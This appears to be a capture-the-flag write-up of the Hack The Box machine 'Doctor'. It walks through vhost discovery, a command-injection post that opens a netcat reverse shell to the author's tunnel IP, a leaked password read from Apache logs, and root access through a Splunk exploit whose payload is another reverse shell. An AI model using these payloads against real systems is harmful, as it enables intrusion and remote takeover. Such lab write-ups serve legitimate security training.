How I completed CTF on HTB::Doctor

In this write-up/blog post, I’ll be going through, how I approached the target (Doctor on hackthebox) and how I figured out the way to own machine.

Firstly, I scanned the target with nmap to find open ports and get some information on the internal ports of the target and service running on them.

picture of nmap scan of the doctor box on hackthebox
nmap scan result for 10.10.10.209 (doctor box)

Since it runs http server on port 80, I opened the target IP address in the web browser and visited the website but I didn’t find anything suspicious to hack.

Website rendered with target IP

I was scratching my head finding nothing and I got attracted to info@doctors.htb and then did something I didn’t thought about.

I went to terminal and typed sudo nano /etc/hosts to edit hosts file in my local machine or simply to say to edit my local DNS.

After editing local DNS, I went back to the web browser and this time I browsed with domain name (doctors.htb) instead of 10.10.10.209 and different webpage got rendered.

Webpage rendered on doctors.htb after editing hosts file

Isn’t this amazing? Different webpage got rendered although domain name point towards the same IP address.

Let me explain you why this happens, if you browse to a box using appropriate domain name (in our case, doctors.htb), web-server will direct you to the content based on the host header that your browser supplies instead if you browse with raw IP, you may land on different webpage or sometimes error page.

You can see this in action right here. You browsed to medium.com and got the page rendered, now if you try browsing directly to 104.16.123.127 , you’ll be rendered different page (in this case error page).

Okay, back to the action. I tried SQL injection on the login page but it didn’t happen to be working. I then looked at the register page and tried registering in it and I got registered.

doctors.htb/register page

I then logged in with the credentials I registered with.

Logging in with the credentials used to register

I got logged in as a user and I looked towards the application and discovered webpage to make a new post. I then opened Netcat to listen on port 4444.

After running netcat on my local machine, I returned back to the website and then tried posting.

http://10.10.14.23/$(nc.traditional$IFS-e$IFS/bin/sh$IFS’10.10.14.23’$IFS’4444’) is vulnerable to RCE.

Here, 10.10.14.23 is my tunnel IP address, to make this work for you, you need to replace it with whatever tunnel IP address is yours and we will get shell access to the machine as a low privileged user.

When I tried viewing user flag, permission was denied.

While moving around the website I had discovered /reset_password path in the website where user can enter the email and reset the password. Since it was running on apache server, I tried accessing the log file of the server and looked for password on backup file.

I found password of the user shaun was Guitar123 and I logged in as user shaun and captured user flag.

You may have looked at nmap scan result before and noticed port 8089 is open which says splunk running on it. So, I googled for “splunk exploit on github” and found SplunkWhisper2 python script by cnotin.

I created a file with nano splunk-exploit.py and copied the script into it and saved it. After this, I ran netcat on port 4445 and I ran the exploit with command :

python3 splunk-exploit.py --host 10.10.10.209 --lhost 10.10.14.23 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.23' '4445'"

Here, replace 10.10.14.23 with your own tunnel IP address.

It gave me root access within some seconds and I captured root flag.

Share some suggestions you got and what did you like and dislike in this write-up.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store